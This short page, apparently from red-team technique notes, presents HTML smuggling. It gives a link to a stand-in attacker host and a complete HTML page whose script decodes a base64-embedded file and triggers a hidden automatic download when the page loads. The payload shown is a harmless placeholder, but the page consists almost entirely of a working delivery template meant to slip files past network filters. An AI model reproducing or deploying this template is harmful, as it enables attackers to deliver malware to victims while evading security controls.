HTML Smuggling
<a href="http://attacker.com/file.doc">Download Me</a><html>
<head>
<title>HTML Smuggling</title>
</head>
<body>
<p>This is all the user will see...</p>
<script>
function convertFromBase64(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
var data = convertFromBase64(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'test.txt';
if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>
Last updated